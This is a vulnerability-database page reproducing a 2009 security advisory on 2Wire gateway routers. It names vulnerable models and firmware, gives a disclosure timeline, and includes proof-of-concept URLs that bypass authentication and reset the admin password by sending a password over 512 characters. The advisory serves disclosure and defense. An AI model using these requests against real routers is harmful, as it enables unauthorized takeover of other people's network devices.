Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

2WIRE Gateway Bypass / Reset

🗓️ 13 Aug 2009 00:00:00Reported by hkmType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

2WIRE Gateway authentication bypass and password reset vulnerabilit

Code
`2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET  
====================================================  
  
  
DESCRIPTION  
-----------------  
There is an authentication bypass vulnerability in page=CD35_SETUP_01  
that allows you to set a new password even if the password was  
previously set.  
  
By setting a new password with more than 512 characters the password  
gets reset and next time you access the router you will be prompted for  
a new password.  
  
  
VULNERABLE  
----------------  
2Wire 2071 Gateway  
2Wire 1800HW  
2Wire 1701HG  
  
Firmware  
5.29.51  
3.17.5  
3.7.1  
  
NOT VULNERABLE  
--------------------  
Firmware  
5.29.135.5 or later  
  
  
DISCLOSURE TIMELINE  
-------------------------  
03/27/2009 - 2wire Contacted  
no satisfactory response  
07/11/2009 - Sent complete details to 2wire  
no response  
07/17/2009 - Sent advisory with video demo to 2wire  
ticket status escalated, but no response  
08/02/2009 - Made public @ Defcon 17  
  
  
EXPLOIT/POC  
-----------------  
Authentication Bypass - just use this page to set a new password  
  
http://gateway.2wire.net?xslt?page=CD35_SETUP_01  
  
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv  
  
  
Password Reset - using the same form but sending a password > 512  
characters  
  
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512*  
  
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv  
  
  
GREETS  
------------  
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf  
h4ckult1m4t3 hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam  
raza-mexicana roa Setting sla.ckers thornmaker tr3w vandida vi0let  
xianur0 Yield  
  
Comunidad Underground de Mexico : https://www.underground.org.mx  
  
  
h k m  
http://www.hakim.ws  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Aug 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
2wire gatewayauthentication bypasspassword resetvulnerabilityfirmwaredisclosure timelineexploit
37